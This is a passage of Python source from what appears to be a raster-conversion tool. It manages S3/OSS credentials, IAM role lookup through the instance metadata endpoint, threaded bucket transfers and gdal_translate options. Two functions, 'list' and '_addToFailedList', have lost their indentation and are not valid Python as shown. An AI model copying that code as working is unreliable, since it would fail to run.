                AWSEndpointURL = 'aws_endpoint_url'
                AWSRegion = 'region'
                SessionProfile = 'profiles'
                region = DefS3Region
                # pick up a custom endpoint/region from the matching profile
                # entry in the AWS config file, when present.
                if (_profile_name and
                        SessionProfile in session._session.full_config and
                        _profile_name in session._session.full_config[SessionProfile]):
                    if (AWSEndpointURL in session._session.full_config[SessionProfile][_profile_name]):
                        endpointURL = session._session.full_config[
                            SessionProfile][_profile_name][AWSEndpointURL]
                        self._base.message('Using {} endpoint> {}'.format(
                            'output' if direction == CS3STORAGE_OUT else 'input', endpointURL))
                    if (AWSRegion in session._session.full_config[SessionProfile][_profile_name]):
                        region = session._session.full_config[SessionProfile][_profile_name][AWSRegion]
                profileCredentials = session.get_credentials()
                if (profileCredentials):
                    # initialize access_key, secret_key using the profile.
                    self.CAWS_ACCESS_KEY_ID = session.get_credentials().access_key
                    self.CAWS_ACCESS_KEY_SECRET = session.get_credentials().secret_key
                    os.environ[AWSAccessKeyId] = self.CAWS_ACCESS_KEY_ID
                    os.environ[AWSSecretAccessKey] = self.CAWS_ACCESS_KEY_SECRET
                else:
                    self._isBucketPublic = True
                # Alibaba OSS endpoints additionally need the OSS_* env vars.
                useAlibaba = endpointURL and endpointURL.lower().find(SigAlibaba) != -1
                if (useAlibaba and
                        self._base.getUserConfiguration.getValue(UseToken)):
                    os.environ['OSS_ACCESS_KEY_ID'] = session.get_credentials(
                    ).access_key
                    os.environ['OSS_SECRET_ACCESS_KEY'] = session.get_credentials(
                    ).secret_key
                self.m_user_config.setValue('{}oss'.format(
                    'in' if direction == CS3STORAGE_IN else 'out'), useAlibaba)
                bucketCon = session.client('s3')
                region = DefS3Region
                try:
                    # prefer the bucket's own region when it can be queried.
                    loc = bucketCon.get_bucket_location(Bucket=self.m_bucketname)[
                        'LocationConstraint']
                    if (loc):
                        region = loc
                except Exception as e:
                    self._base.message(
                        'get/bucket/region ({})'.format(str(e)), self._base.const_warning_text)
                self.con = session.resource('s3', region, endpoint_url=endpointURL if endpointURL else None, config=botocore.config.Config(
                    s3={'addressing_style': 'virtual'}))
                if (self._isBucketPublic):
                    # public buckets are accessed without request signing.
                    self.con.meta.client.meta.events.register(
                        'choose-signer.s3.*', botocore.handlers.disable_signing)
            except Exception as e:
                self._base.message(str(e), self._base.const_critical_text)
                return False
            try:
                self.bucketupload = self.con.Bucket(self.m_bucketname)
                if (direction == CS3STORAGE_OUT):
                    # detect whether the output bucket is world-readable; if
                    # not, later reads of written outputs must use tokens.
                    ACL = self.bucketupload.Acl()
                    if (ACL is not None):
                        grants = ACL.grants
                        isOutBktPrivate = True
                        for grant in grants:
                            grantInfo = grant['Grantee']
                            if (grantInfo['Type'] == 'Group' and
                                    grantInfo['URI'] == 'http://acs.amazonaws.com/groups/global/AllUsers' and
                                    grant['Permission'] == 'READ'):
                                isOutBktPrivate = False
                                break
                        if (isOutBktPrivate):
                            self._base.getUserConfiguration.setValue(
                                UseTokenOnOuput, True)
                self.con.meta.client.head_bucket(Bucket=self.m_bucketname)
            except botocore.exceptions.ClientError as e:
                try:
                    errCode = int(e.response['Error']['Code'])
                except ValueError as e:
                    errCode = -1
                if (errCode == 403):
                    # probe with a bogus key to distinguish requester-pays
                    # buckets (404 on the probe) from plain access denial (403).
                    try:
                        fetchMeta = self.con.meta.client.head_object(
                            Bucket=self.m_bucketname, RequestPayer='requester', Key='_*CHS')
                    except Exception as e:
                        if (int(e.response['Error']['Code']) == 404):
                            self._isRequesterPay = True
                            os.environ['AWS_REQUEST_PAYER'] = 'requester'
                            # overrides, the cmd-line -usetoken plus the <UseToken> node value in the parameter file.
                            self._base.getUserConfiguration.setValue(
                                UseToken, True)
                        elif(int(e.response['Error']['Code']) == 403):
                            self._isNoAccessToListBuckets = True
                if (not self._isRequesterPay and
                        not self._isNoAccessToListBuckets):
                    self._base.message('Invalid {} S3 bucket ({})/credentials.'.format(
                        CRESUME_HDR_OUTPUT if direction == CS3STORAGE_OUT else CRESUME_HDR_INPUT,
                        self.m_bucketname),
                        self._base.const_critical_text)
                    return False
                os.environ[AWSAccessKeyId] = session.get_credentials(
                ).access_key
                os.environ[AWSSecretAccessKey] = session.get_credentials(
                ).secret_key
            except Exception as e:
                self._base.message(str(e), self._base.const_critical_text)
                return False
    _remote_path = remote_path
    if (_remote_path and
            os.path.isfile(_remote_path)):  # are we reading a file list?
        self._input_flist = _remote_path
        try:
            global _rpt
            _remote_path = _rpt.root
        except Exception as e:
            self._base.message('Report ({})'.format(
                str(e)), self._base.const_critical_text)
            return False
    self.remote_path = self._base.convertToForwardSlash(_remote_path)
    if (not self.remote_path):
        self.remote_path = ''  # defaults to bucket root.
    return True
def getIamRoleInfo(self):
    """Fetch temporary credentials for the EC2 instance's IAM role.

    Queries the instance metadata endpoint for the role name, then for the
    role's credential document. Returns the parsed dict when it contains
    the access-key id, secret key and token entries; otherwise None.
    """
    metaUrl = 'http://169.254.169.254/latest/meta-data/iam/security-credentials'
    response = None
    try:
        response = urlopen(metaUrl)
        roleName = response.read().decode('utf-8')
        if (-1 != roleName.find('404')):
            # metadata service answered but no role is attached.
            return None
        response.close()
        response = urlopen('{}/{}'.format(metaUrl, roleName))
        credentials = json.loads(response.read())
    except Exception as e:
        self._base.message('IAM Role not found.\n{}'.format(
            str(e)), self._base.const_critical_text)
        return None
    finally:
        if (response):
            response.close()
    hasRequiredKeys = (self.RoleAccessKeyId in credentials and
                       self.RoleSecretAccessKey in credentials and
                       self.RoleToken in credentials)
    return credentials if hasRequiredKeys else None
def getEndPoint(self, domain):
    """Resolve the effective S3 endpoint for *domain* (best effort).

    S3 answers requests sent to the wrong regional endpoint with an XML
    error document carrying an <Endpoint> element; this follows that hint.
    Returns *domain* unchanged when anything goes wrong.
    """
    redirectEndPoint = domain
    urlResponse = None
    try:
        urlResponse = urlopen(domain)
        doc = minidom.parseString(urlResponse.read())
        endPoint = doc.getElementsByTagName('Endpoint')
        redirectEndPoint = 'http://{}/'.format(
            endPoint[0].firstChild.nodeValue)
    except Exception as e:
        pass  # deliberate best effort; fall back to the caller's domain.
    finally:
        # fix: the HTTP response was previously never closed (handle leak).
        if (urlResponse is not None):
            urlResponse.close()
    return redirectEndPoint
@property
def inputPath(self):
    # Local root folder that uploads originate from / downloads map onto
    # (assigned by the caller through the setter below).
    return self.__m_input_path

@inputPath.setter
def inputPath(self, value):
    self.__m_input_path = value
def getFailedUploadList(self):
    # Returns the dict of failed uploads populated by _addToFailedList,
    # shaped as {'upl': [{'local': ..., 'remote': ...}, ...]}.
    return self.__m_failed_upl_lst
def list(self, connection, bucket, prefix, includeSubFolders=False, keys=[], marker=''):
try: # requires/ListObjects access.
result = connection.meta.client.list_objects(
Bucket=bucket, Prefix=prefix, Delimiter='/', Marker=marker, RequestPayer='requester' if self._isRequesterPay else '')
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
Contents = 'Contents'
NextMarker = 'NextMarker'
if (Contents in result):
for k in result[Contents]:
keys.append(k['Key'])
for item in result.get('CommonPrefixes', []):
if (not includeSubFolders):
if (item['Prefix'].endswith('/')):
continue
self.list(connection, bucket, item.get('Prefix'),
includeSubFolders, keys, marker)
if (NextMarker in result):
self.list(connection, bucket, prefix,
includeSubFolders, keys, result[NextMarker])
return keys
def getS3Content(self, prefix, cb=None, precb=None):
    """Enumerate bucket objects under *prefix* and dispatch each key.

    cb    -- callback(key, relative_path) that performs the actual work;
             run on daemon worker threads, up to CCFG_THREADS at a time.
    precb -- optional predicate; when it returns True the key is treated
             as a raster and is only copied locally when temp-input is on.
    TIL files are registered/parsed up-front when a TIL handler exists.
    Returns True on success, False on any error (already messaged).
    """
    isLink = self._input_flist is not None
    subs = True
    if (self.m_user_config):
        root_only_ = self.m_user_config.getValue('IncludeSubdirectories')
        # fix: test the configured value, not (subs) which is never None;
        # the old test made a *missing* setting disable subfolder traversal.
        if (root_only_ is not None):  # if there's a value, take it else defaults to (True)
            subs = self._base.getBooleanValue(root_only_)
    keys = self.list(self.con, self.m_bucketname, prefix,
                     includeSubFolders=subs, keys=[], marker='') if not isLink else _rpt
    if (not keys):
        return False
    isRoot = self.remote_path == '/'
    # get the til files first
    if (til):
        if (not til.TILCount):
            try:
                for key in keys:
                    if (not key or
                            key.endswith('/')):
                        continue
                    if (key.lower().endswith(CTIL_EXTENSION_)):
                        # remote path following the input folder/.
                        S3_path = key.replace(
                            self.remote_path if not isRoot else '', '')
                        # callback on the client-side
                        cb(key, S3_path)
                        outputPath = self.m_user_config.getValue(
                            CCFG_PRIVATE_OUTPUT, False) + S3_path
                        isCloudUpload = self._base.getBooleanValue(
                            self.m_user_config.getValue(CCLOUD_UPLOAD))
                        if ((self.m_user_config.getValue(CISTEMPOUTPUT)) and
                                isCloudUpload):
                            # -tempoutput must be set with -cloudoutput=true
                            outputPath = self.m_user_config.getValue(
                                CTEMPOUTPUT, False) + S3_path
                        til.addTIL(key)
                        til.setOutputPath(key, outputPath)
                        tilObj = self.con.meta.client.get_object(
                            Bucket=self.m_bucketname, Key=key)
                        tilContentsAsString = tilObj['Body'].read().decode(
                            'utf-8')
                        til.processInMemoryTILContent(
                            key, tilContentsAsString)
            except Exception as e:
                self._base.message(
                    str(e), self._base.const_critical_text)
                return False
    # ends
    try:
        threads = []
        keysIndx = 0
        nBuffer = CCFG_THREADS
        while(1):
            nThreads = len(threads)
            # wait (busy-spin) until at least one worker has finished, then
            # refill the buffer with as many keys as slots freed up.
            while(nThreads > 0):
                alive = [t.is_alive() for t in threads]
                nDead = sum(not x for x in alive)
                if (nDead):
                    nBuffer = nDead
                    threads = [t for t in threads if t.is_alive()]
                    break
            buffer = []
            if (keysIndx == 0):
                if (keys[keysIndx].endswith('/')):
                    keysIndx += 1
            for i in range(keysIndx, keysIndx + nBuffer):
                if (i >= len(keys)):
                    break
                buffer.append(keys[i])
            keysIndx += nBuffer
            if (len(buffer) == 0 and
                    len(threads) == 0):
                break
            for key in buffer:
                try:
                    # remote path following the input folder/.
                    remotePath = key.replace(
                        self.remote_path if not isRoot else '', '')
                    if (not key or
                            key.endswith('/')):
                        continue
                    if (cb):
                        if (precb):
                            # is raster/exclude list?
                            if (precb(remotePath, self.remote_path, self.inputPath)):
                                copyRemoteRaster = False
                                if (til and
                                        til.defaultTILProcessing and
                                        til.fileTILRelated(os.path.basename(key))):
                                    # copy ancillary TIL files if the default TIL processing is set to (true)
                                    copyRemoteRaster = True
                                if (not copyRemoteRaster and
                                        not key.lower().endswith(CTIL_EXTENSION_)):  # TIL is a raster but we need to copy it locally.
                                    if (not self._base.getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
                                        continue
                        t = threading.Thread(target=cb,
                                             args=(key, remotePath))
                        t.daemon = True
                        t.start()
                        threads.append(t)
                except Exception as e:
                    self._base.message(
                        str(e), self._base.const_critical_text)
                    return False
    except Exception as e:
        self._base.message(str(e), self._base.const_critical_text)
        return False
    return True
@TimeIt.timeOperation
def __copyRemoteToLocal(self, S3_key, mk_path, **kwargs):
    """Download one object (S3_key) to the local path (mk_path).

    The extra **kwargs (name/method/store) are presumably consumed by the
    @TimeIt.timeOperation decorator -- TODO confirm. (fptrRefresh) is used
    here to obtain fresh credentials and retry when the token expired.
    Returns True on success; failures update the global report (_rpt).
    """
    try:
        self.con.meta.client.download_file(self.m_bucketname, S3_key, mk_path, ExtraArgs={
            'RequestPayer': 'requester'} if self._isRequesterPay else {})
    except Exception as e:
        msg = str(e)
        isRefreshToken = msg.find('(ExpiredToken)') != -1
        if (isRefreshToken):
            # expired session token: refresh credentials and recurse.
            if ('fptrRefresh' in kwargs):
                bucket = kwargs['fptrRefresh']()
                if (bucket):
                    ret = self.__copyRemoteToLocal(S3_key, mk_path, **kwargs)  # retry once
                    if (ret):
                        return True
        self._base.message('({}\n{})'.format(
            str(e), mk_path), self._base.const_critical_text)
        if (_rpt):
            _rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_NO)
        return False
    return True
def S3_copy_to_local(self, S3_key, S3_path):
    """Pull one object (S3_key) down to the local output/temp folder.

    S3_path is the key relative to the input prefix; it is appended to
    the configured output (or temp) folder to build the local path.
    Honors the resume report (_rpt), the exclude/raster filters and, when
    cloud output is enabled, pushes non-raster files right away via S3Upl.
    Returns True on success (or an already-copied resume hit); False on
    failure or when the key is filtered out.
    """
    err_msg_0 = 'S3/Local path is invalid'
    if (S3_key is None):  # get rid of invalid args.
        self._base.message(err_msg_0)
        return False
    # what does the restore point say about the (S3_key) status?
    if (_rpt):
        _get_rstr_val = _rpt.getRecordStatus(S3_key, CRPT_COPIED)
        if (_get_rstr_val == CRPT_YES):
            self._base.message('{} {}'.format(CRESUME_MSG_PREFIX, S3_key))
            return True
    # ends
    if (self.m_user_config is None):  # shouldn't happen
        self._base.message(
            'Internal/User config not initialized.', self._base.const_critical_text)
        return False
    output_path = self.m_user_config.getValue(
        CCFG_PRIVATE_OUTPUT, False) + S3_path
    is_cpy_to_s3 = self._base.getBooleanValue(
        self.m_user_config.getValue(CCLOUD_UPLOAD))
    if ((self.m_user_config.getValue(CISTEMPOUTPUT)) and
            is_cpy_to_s3):
        # -tempoutput must be set with -cloudoutput=true
        output_path = self.m_user_config.getValue(
            CTEMPOUTPUT, False) + S3_path
    is_raster = False
    is_tmp_input = self._base.getBooleanValue(
        self.m_user_config.getValue(CISTEMPINPUT))
    primaryRaster = None
    if (_rpt and
            is_tmp_input):
        primaryRaster = _rpt._m_rasterAssociates.findPrimaryExtension(
            S3_path)
    if (filterPaths(S3_key, self.m_user_config.getValue(CCFG_EXCLUDE_NODE))):
        return False
    elif (primaryRaster or  # if the S3_key is an associated raster file, consider it as a raster.
            filterPaths(S3_key, self.m_user_config.getValue(CCFG_RASTERS_NODE))):
        isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
        if (is_tmp_input):
            if (not isTIL):
                useTempInputPath = True
                if (til and
                        til.fileTILRelated(S3_path) and
                        til.defaultTILProcessing):
                    useTempInputPath = False
                if (useTempInputPath):
                    output_path = self.m_user_config.getValue(
                        CTEMPINPUT, False) + S3_path
        is_raster = not isTIL
    if (self.m_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
        return False
    # collect input file names.
    if (fn_collect_input_files(S3_key)):
        return False
    # ends
    mk_path = output_path
    self._base.message('[S3-Pull] %s' % (mk_path))
    mk_path = self._base.renameMetaFileToMatchRasterExtension(mk_path)
    flr = os.path.dirname(mk_path)
    if (not os.path.exists(flr)):
        try:
            makedirs(flr)
        except Exception as e:
            self._base.message('(%s)' %
                               (str(e)), self._base.const_critical_text)
            if (_rpt):
                _rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_NO)
            return False
    # let's write remote to local
    result = self.__copyRemoteToLocal(
        S3_key, mk_path, name=S3_key, method=TimeIt.Download, store=self._base, fptrRefresh=self.refresh)
    if (not result):
        return False
    # ends
    # mark download/copy status
    if (_rpt):
        _rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_YES)
    # ends
    # copy metadata files to -clonepath if set
    if (not is_raster):  # do not copy raster associated files to clone path.
        self._base.copyMetadataToClonePath(mk_path)
    # ends
    # Handle any post-processing, if the final destination is to S3, upload right away.
    if (is_cpy_to_s3):
        if (getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
            if (is_raster):
                return True
        if (til and
                til.defaultTILProcessing and
                is_raster and
                til.fileTILRelated(mk_path)):
            return True
        _is_success = self._base.S3Upl(mk_path, user_args_Callback)
        if (not _is_success):
            return False
    # ends
    return True
# ends
def upload(self):
    """Walk inputPath and push every file under it to the bucket.

    Individual failures are reported as warnings and skipped; the method
    always returns True.
    """
    self._base.message('[S3-Push]..')
    for r, d, f in os.walk(self.inputPath):
        for file in f:
            lcl_file = os.path.join(r, file).replace('\\', '/')
            upl_file = lcl_file.replace(self.inputPath, self.remote_path)
            self._base.message(upl_file)
            # fix: S3 must exist before the try; if S3Upload() itself raised,
            # the finally block used to hit an unbound local.
            S3 = None
            try:
                # NOTE(review): unlike upload_group, S3Upload here is called
                # without the leading self._base argument -- confirm which
                # constructor signature is the intended one.
                S3 = S3Upload(self.bucketupload, upl_file, lcl_file, self.m_user_config.getValue(
                    COUT_S3_ACL) if self.m_user_config else None)
                if (not S3.init()):
                    self._base.message('Unable to initialize [S3-Push] for (%s=%s)' % (
                        lcl_file, upl_file), self._base.const_warning_text)
                    continue
                ret = S3.upload()
                if (not ret):
                    self._base.message(
                        '[S3-Push] (%s)' % (upl_file), self._base.const_warning_text)
                    continue
            except Exception as e:
                self._base.message('(%s)' %
                                   (str(e)), self._base.const_warning_text)
            finally:
                if (S3 is not None):
                    del S3
    return True
def _addToFailedList(self, localPath, remotePath):
if ('upl' not in self.getFailedUploadList()):
self.__m_failed_upl_lst['upl'] = []
_exists = False
for v in self.__m_failed_upl_lst['upl']:
if (v['local'] == localPath):
_exists = True
break
if (not _exists):
self.__m_failed_upl_lst['upl'].append(
{'local': localPath, 'remote': remotePath})
return True
def upload_group(self, input_source, single_upload=False, include_subs=False):
    """Upload *input_source* plus its sibling outputs (same stem, any ext).

    single_upload -- upload only (input_source) itself and return.
    include_subs  -- also walk into sub-folders of the source folder.
    Resume status comes from the global report (_rpt); failures are
    recorded via _addToFailedList. Returns the list of local paths
    processed (note: a path is appended even when its upload raised and
    was reported -- only init/retry failures skip the append).
    """
    global _rpt
    m_input_source = input_source.replace('\\', '/')
    input_path = os.path.dirname(m_input_source)
    upload_buff = []
    usrPath = self.m_user_config.getValue(CUSR_TEXT_IN_PATH, False)
    # default insert pos (sub-folder loc) for user text in output path
    usrPathPos = CHASH_DEF_INSERT_POS
    if (usrPath):
        (usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
    (p, e) = os.path.splitext(m_input_source)
    for r, d, f in os.walk(input_path):
        for file in f:
            mk_path = os.path.join(r, file).replace('\\', '/')
            # pick the exact file (single upload) or any file sharing the
            # same stem (e.g. a raster and its sidecar outputs).
            if ((single_upload and
                 (mk_path == m_input_source)) or
                    mk_path.startswith('{}.'.format(p))):
                try:
                    S3 = _source_path = None
                    if (_rpt):
                        _source_path = getSourcePathUsingTempOutput(
                            mk_path)
                        if (_source_path):
                            _ret_val = _rpt.getRecordStatus(
                                _source_path, CRPT_UPLOADED)
                            if (_ret_val == CRPT_YES):
                                # already uploaded per the resume report.
                                continue
                    upl_file = mk_path.replace(
                        self.inputPath, self.remote_path)
                    if (getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD))):
                        rep = self.inputPath
                        if (not rep.endswith('/')):
                            rep += '/'
                        if (getBooleanValue(self.m_user_config.getValue(CISTEMPOUTPUT))):
                            rep = self.m_user_config.getValue(
                                CTEMPOUTPUT, False)
                        upl_file = mk_path.replace(rep, self.remote_path if self.m_user_config.getValue(
                            'iss3') else self.m_user_config.getValue(CCFG_PRIVATE_OUTPUT, False))
                    if (usrPath):
                        upl_file = self._base.insertUserTextToOutputPath(
                            upl_file, usrPath, usrPathPos)
                    S3 = S3Upload(self._base, self.bucketupload, upl_file, mk_path, self.m_user_config.getValue(
                        COUT_S3_ACL) if self.m_user_config else None)
                    if (not S3.init()):
                        self._base.message('Unable to initialize S3-Upload for (%s=>%s)' % (
                            mk_path, upl_file), self._base.const_warning_text)
                        self._addToFailedList(mk_path, upl_file)
                        continue
                    upl_retries = CS3_UPLOAD_RETRIES
                    ret = False
                    while(upl_retries and not ret):
                        ret = S3.upload(
                            name=_source_path, method=TimeIt.Upload, store=self._base, fptrRefresh = self.refresh)
                        if (not ret):
                            # let's sleep for a while until s3 kick-starts
                            time.sleep(10)
                            upl_retries -= 1
                            self._base.message('[S3-Push] (%s), retries-left (%d)' % (
                                upl_file, upl_retries), self._base.const_warning_text)
                    if (not ret):
                        self._addToFailedList(mk_path, upl_file)
                        if (S3 is not None):
                            del S3
                            S3 = None
                        continue
                except Exception as inf:
                    self._base.message(
                        '(%s)' % (str(inf)), self._base.const_critical_text)
                finally:
                    if (S3 is not None):
                        del S3
                        S3 = None
                # successful entries to return.
                upload_buff.append(mk_path)
                if (single_upload):
                    return upload_buff
        if (not include_subs):
            return upload_buff
    return upload_buff  # this could be empty.
def refresh(self):
    """Re-initialize the S3 session to pick up fresh credentials.

    Invoked (via fptrRefresh) when a transfer fails with an expired token.
    Returns the refreshed bucket object, or None when init() fails.
    """
    self._base.message('Refreshing token to {}...'.format('read' if self._direction == CS3STORAGE_IN else 'write'))
    ret = self.init(self.remote_path, self.CAWS_ACCESS_KEY_ID, self.CAWS_ACCESS_KEY_SECRET, self._direction)
    # security fix: the previous code fetched the IAM role credentials a
    # second time and wrote the secret access key and session token into
    # the log (and crashed with a TypeError when no role was found).
    # Never log secrets; report only the outcome of the refresh.
    self._base.message('Refreshed token info,\n{}'.format(ret))
    if (not ret):
        return None
    return self.bucketupload
# ends
# Indexes into the (user_data) list passed to the GDAL argument callbacks
# below (args_Callback / args_Callback_for_meta).
CIDX_USER_INPUTFILE = 0
CIDX_USER_CONFIG = 2
CIDX_USER_CLSBASE = 3
# Default raster block/tile size used when the config supplies none.
CCFG_BLOCK_SIZE = 512
# -pyramids command modes.
CCMD_PYRAMIDS_ONLY = 'only'
CCMD_PYRAMIDS_EXTERNAL = 'external'
CCMD_PYRAMIDS_SOURCE = 'source'  # Used by CreateRasterProxy
# Default worker-thread count for parallel transfers.
CCFG_THREADS = 10
# Parameter-file node names for the raster/exclude filters.
CCFG_RASTERS_NODE = 'RasterFormatFilter'
CCFG_EXCLUDE_NODE = 'ExcludeFilter'
# Internal (double-underscored) configuration keys, not user facing.
CCFG_PRIVATE_INC_BOTO = '__inc_boto__'
CCFG_PRIVATE_OUTPUT = '__output__'
CFGAZSAS = '__szsas__'
CFGAZSASW = '__szsasw__'
CCFG_LAMBDA_INVOCATION_ERR = '__LAMBDA_INV_ERR__'
# GDAL creation-option config keys.
CCFG_INTERLEAVE = 'Interleave'
CCFG_PREDICTOR = 'Predictor'
# log status
const_general_text = 0
const_warning_text = 1
const_critical_text = 2
const_status_text = 3
# ends
def messageDebug(msg, status):
    # Debug logger: echoes *msg* to stdout with a '*' prefix to make debug
    # output visually distinct; (status) is accepted but not acted on here.
    print('*{}'.format(msg))
def Message(msg, status=0):
    # Module-level fallback logger used when no Base instance is available;
    # (status) mirrors the const_*_text levels but is not acted on here.
    print(msg)
def args_Callback(args, user_data=None):
    """Build the gdal_translate argument list for the main conversion.

    args -- list to extend in place (also returned).
    user_data -- optional [input_file, ?, config, base] list (see the
    CIDX_USER_* indexes); when absent or faulty, built-in defaults apply.
    """
    _LERC = 'lerc'
    _LERC2 = 'lerc2'
    _JPEG = 'jpeg'
    _JPEG12 = 'jpeg12'
    m_compression = _LERC  # default if external config is faulty
    m_lerc_prec = None
    m_compression_quality = DefJpegQuality
    m_bsize = CCFG_BLOCK_SIZE
    m_mode = 'chs'
    m_nodata_value = None
    m_predictor = 1
    m_interleave = 'PIXEL'
    # fix: m_ignorealphaband is referenced in the mrf/jpeg branch below and
    # used to be unbound when (user_data) was absent or the config read failed.
    m_ignorealphaband = False
    isCOG = False
    if (user_data):
        try:
            userParameters = user_data[CIDX_USER_CONFIG].getValue(
                'GDAL_Translate_UserParameters')
            if (userParameters):
                [args.append(i) for i in userParameters.split()]
            compression_ = user_data[CIDX_USER_CONFIG].getValue(
                'Compression').lower()
            useCOGTIFF = user_data[CIDX_USER_CONFIG].getValue('cog') == True
            if (useCOGTIFF):
                compression_ = 'deflate'
            if (compression_):
                m_compression = compression_
            compression_quality_ = user_data[CIDX_USER_CONFIG].getValue(
                'Quality')
            if (compression_quality_):
                m_compression_quality = compression_quality_
            bsize_ = user_data[CIDX_USER_CONFIG].getValue('BlockSize')
            if (bsize_):
                m_bsize = bsize_
            lerc_prec_ = user_data[CIDX_USER_CONFIG].getValue('LERCPrecision')
            if (lerc_prec_):
                m_lerc_prec = lerc_prec_
            m_nodata_value = user_data[CIDX_USER_CONFIG].getValue(
                'NoDataValue')
            m_ignorealphaband = getBooleanValue(
                user_data[CIDX_USER_CONFIG].getValue('IgnoreAlphaBand'))
            m_mode = user_data[CIDX_USER_CONFIG].getValue('Mode')
            m_predictor_ = user_data[CIDX_USER_CONFIG].getValue(CCFG_PREDICTOR)
            if (m_predictor_):
                m_predictor = m_predictor_
            m_interleave_ = user_data[CIDX_USER_CONFIG].getValue(
                CCFG_INTERLEAVE)
            if (m_interleave_):
                m_interleave = m_interleave_.upper()
            # Mode may be '<output>_<compression>', e.g. 'tif_lzw' or 'tif_cog'.
            mode_ = m_mode.split('_')
            if (len(mode_) > 1):
                m_mode = mode_[0]  # mode/output
                if (mode_[1].lower() == 'cog'):
                    m_mode = mode_[1]
                    isCOG = True
                else:
                    m_compression = mode_[1].lower()  # compression
            if (m_mode.startswith(('tif', 'cog'))):
                args.append('-co')
                args.append('BIGTIFF=IF_NEEDED')
                if (not isCOG):
                    args.append('-co')
                    args.append('TILED=YES')
                m_mode = 'GTiff'  # so that gdal_translate can understand.
                if (m_interleave == 'PIXEL' and
                        m_compression.startswith(_JPEG)):
                    _base = user_data[CIDX_USER_CLSBASE]
                    if (_base):
                        gdalInfo = GDALInfo(_base)
                        gdalInfo.init(user_data[CIDX_USER_CONFIG].getValue(
                            CCFG_GDAL_PATH, False))
                        if (gdalInfo.process(user_data[CIDX_USER_INPUTFILE])):
                            ret = gdalInfo.bandInfo
                            if (ret and
                                    len(ret) != 1):
                                if (not isCOG):  # To omit the GDAL warning, COG driver by default selects the PHOTOMETRIC=YCBCR for jpeg compression.
                                    args.append('-co')
                                    args.append('PHOTOMETRIC=YCBCR')
                if (m_compression == _JPEG12):
                    args.append('-co')
                    args.append('NBITS=12')
                    m_compression = _JPEG
                if (m_interleave == 'PIXEL' and
                        m_compression in ('deflate', 'lzw')):
                    args.append('-co')
                    args.append('predictor={}'.format(m_predictor))
        except BaseException:  # could throw if index isn't found
            pass  # ingnore with defaults.
    args.append('-of')
    args.append(m_mode)
    args.append('-co')
    args.append('COMPRESS=%s' %
                (_LERC if m_compression == _LERC2 else m_compression))
    if (m_nodata_value):
        args.append('-a_nodata')
        args.append(str(m_nodata_value))
    if (m_compression == _JPEG):
        args.append('-co')
        if (m_mode == 'mrf'):  # if the output is (mrf)
            args.append('QUALITY=%s' % (m_compression_quality))
            if (m_ignorealphaband):
                args.append('-co')
                args.append('OPTIONS="MULTISPECTRAL:1"')
        else:
            args.append('{}QUALITY={}'.format('JPEG_' if not isCOG else '', m_compression_quality))
    if (not isCOG):
        args.append('-co')
        args.append('INTERLEAVE=%s' % (m_interleave))
    if (m_compression.startswith(_LERC)):
        if (m_lerc_prec or
                m_compression == _LERC2 or
                m_compression == _LERC):
            args.append('-co')
            args.append('OPTIONS="{}{}"'.format('' if not m_lerc_prec else 'LERC_PREC={}'.format(m_lerc_prec), '{}V2=ON'.format(
                ' ' if m_lerc_prec else '') if m_compression == _LERC2 or m_compression == _LERC else ''))
    args.append('-co')
    if (m_mode.lower() == 'gtiff'):
        args.append('{}={}'.format('BLOCKXSIZE', m_bsize))
        args.append('-co')
        args.append('{}={}'.format('BLOCKYSIZE', m_bsize))
    else:
        args.append('{}={}'.format('BLOCKSIZE', m_bsize))
    return args
def args_Callback_for_meta(args, user_data=None):
    """Build the gdal_translate argument list for MRF metadata/proxy output.

    args -- list to extend in place (also returned).
    user_data -- [input_file, ?, config, base] list (see CIDX_USER_*);
    note user_data[0] (the cache source path) is read unconditionally, so
    user_data must be provided.
    """
    _LERC = 'lerc'
    _LERC2 = 'lerc2'
    m_scale = 2
    m_bsize = CCFG_BLOCK_SIZE
    m_pyramid = True
    m_comp = _LERC
    m_lerc_prec = None
    m_compression_quality = DefJpegQuality
    # fix: m_interleave is emitted unconditionally below but had no default,
    # so a missing/faulty config left it unbound (args_Callback defaults it
    # to 'PIXEL' the same way).
    m_interleave = 'PIXEL'
    if (user_data):
        try:
            scale_ = user_data[CIDX_USER_CONFIG].getValue('Scale')
            if (scale_):
                m_scale = scale_
            bsize_ = user_data[CIDX_USER_CONFIG].getValue('BlockSize')
            if (bsize_):
                m_bsize = bsize_
            ovrpyramid = user_data[CIDX_USER_CONFIG].getValue('isuniformscale')
            if (ovrpyramid is not None):
                m_pyramid = ovrpyramid
            if (m_pyramid == 'source'):
                # pyramid setting deferred to the per-raster report metadata.
                rpt = user_data[CIDX_USER_CLSBASE].getUserConfiguration.getValue(
                    CPRT_HANDLER)
                if (rpt):
                    cldInput = user_data[CIDX_USER_CONFIG].getValue(
                        CIN_S3_PREFIX, False)
                    rptName = user_data[0].replace(
                        cldInput, '') if cldInput is not None else user_data[0]
                    ovrpyramid = rpt.getMetadata(rptName, 'isuniformscale')
                    m_pyramid = None if ovrpyramid is None else ovrpyramid
            py_comp = user_data[CIDX_USER_CONFIG].getValue('Compression')
            if (py_comp):
                m_comp = py_comp
            compression_quality_ = user_data[CIDX_USER_CONFIG].getValue(
                'Quality')
            if (compression_quality_):
                m_compression_quality = compression_quality_
            m_interleave_ = user_data[CIDX_USER_CONFIG].getValue(
                CCFG_INTERLEAVE)
            if (m_interleave_):
                m_interleave = m_interleave_.upper()
            lerc_prec = user_data[CIDX_USER_CONFIG].getValue('LERCPrecision')
            if (lerc_prec):
                m_lerc_prec = lerc_prec
        except BaseException:  # could throw if index isn't found
            pass  # ingnore with defaults.
    args.append('-of')
    args.append('MRF')
    args.append('-co')
    args.append('COMPRESS=%s' % (_LERC if m_comp == _LERC2 else m_comp))
    if (m_comp.startswith(_LERC)):
        if (m_lerc_prec or
                m_comp == _LERC2 or
                m_comp == _LERC):
            args.append('-co')
            args.append('OPTIONS="{}{}"'.format('' if not m_lerc_prec else 'LERC_PREC={}'.format(
